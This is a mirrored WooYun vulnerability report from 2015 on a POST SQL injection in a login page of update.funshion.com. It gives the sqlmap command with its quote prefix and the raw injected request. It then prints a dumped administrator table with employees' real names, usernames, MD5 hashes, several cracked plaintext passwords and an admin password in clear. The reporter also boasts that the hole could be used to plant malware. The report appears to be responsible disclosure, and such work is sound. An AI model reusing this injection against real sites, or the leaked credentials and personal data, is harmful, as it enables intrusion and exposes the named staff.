乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-02: 细节已通知厂商并且等待厂商处理中 2015-09-02: 厂商已经确认,细节仅向厂商公开 2015-09-12: 细节向核心白帽子及相关领域专家公开 2015-09-22: 细节向普通白帽子公开 2015-10-02: 细节向实习白帽子公开 2015-10-17: 细节向公众公开
http://update.funshion.com/login/index.php?c=login&a=login&so=begin 存在POST注入这里也算是SQLMAP经典使用方法了,跑了很多次,加脚本也不行,后来burp研究了一会,要前面+' 后面的payload才能正常使用>sqlmap.py -r e:\1.txt --prefix "'" --dbs请给20RANK,这危害不是闹着玩的,一挂马,6666求个雷!!!!
POST /login/index.php?c=login&a=login&so=end HTTP/1.1Host: update.funshion.comContent-Length: 58Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://update.funshion.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0Content-Type: application/x-www-form-urlencodedReferer: http://update.funshion.com/login/index.php?c=login&a=login&so=endAccept-Encoding: gzip,deflateAccept-Language: zh-CN,zh;q=0.8Cookie: PHPSESSID=f777sgdacq5chrpct6qtjgl137username=aaaa%27&password=803e80d5e6318ca76c3709205b2af3c9
POST数据
Table: fs_sys_user[13 entries]+---------+---------+---------------------+----------------------------------------------+-----------+------------+--------------+---------------+| user_id | isvalid | reg_time | password | real_name | user_name | original_pwd | is_super_user |+---------+---------+---------------------+----------------------------------------------+-----------+------------+--------------+---------------+| 2 | 0 | 2014-11-12 11:09:05 | 96e79218965eb72c92a549dd5a330112 (111111) | guochao | guochao | <blank> | 0 || 1 | 1 | 2008-11-17 17:06:56 | c65783822192063374ae61ae9466382b | funshion | admin | Fun7year | 1 || 3 | 1 | 2014-11-12 16:33:24 | 2c7f89d0ea4dc3b6efe3a6f2b8b113c9 (lijianfei) | 李建飞 | lijianfei | <blank> | 0 || 4 | 1 | 2014-11-12 16:37:41 | beaa28d6fd73251c4f3bcafd0b05d701 (hujinming) | 胡晋铭 | hujinming | <blank> | 0 || 5 | 1 | 2014-11-12 16:39:40 | 80542b14848627720fd12395e1cd3ba9 | 郭建标 | guojb | <blank> | 0 || 6 | 1 | 2014-11-12 16:40:57 | 9cbf8a4dcb8e30682b927f352d6559a0 (123456a) | 张旭东 | zhangxd | <blank> | 0 || 7 | 1 | 2014-11-12 16:42:49 | 76419c58730d9f35de7ac538c2fd6737 (qazwsx) | 谢浩 | xiehao | <blank> | 0 || 8 | 1 | 2014-11-12 16:44:33 | e10adc3949ba59abbe56e057f20f883e (123456) | 何江盼 | hejiangpan | <blank> | 0 || 9 | 1 | 2014-11-12 16:45:24 | e10adc3949ba59abbe56e057f20f883e (123456) | 张亚娟 | zhangyj | <blank> | 0 || 10 | 1 | 2014-11-12 16:45:47 | eb895e86d3ea9aa68d9fc059a699865b (zhoujy) | 周继勇 | zhoujy | <blank> | 0 || 11 | 1 | 2014-11-12 16:46:21 | 96e79218965eb72c92a549dd5a330112 (111111) | 王彦珑 | wangyl | <blank> | 0 || 12 | 1 | 2015-03-25 10:23:40 | 96e79218965eb72c92a549dd5a330112 (111111) | 陈锡岩 | chenxy | <blank> | 0 || 13 | 1 | 2015-05-15 10:52:13 | c62c078b72d487801f8c8b642f056bc6 | 宓凯 | mikai | <blank> | 0 |+---------+---------+---------------------+----------------------------------------------+-----------+------------+--------------+---------------+
管理账号
http://neirong.funshion.com/updater/7/2.3.1.23/package/FunshionAphone2.3.1.23_sid_1010_zipalign.apk
APK下载地址,已验证确实是官网链接。
危害等级:中
漏洞Rank:10
确认时间:2015-09-02 14:35
非常感谢您对风行安全的观注
暂无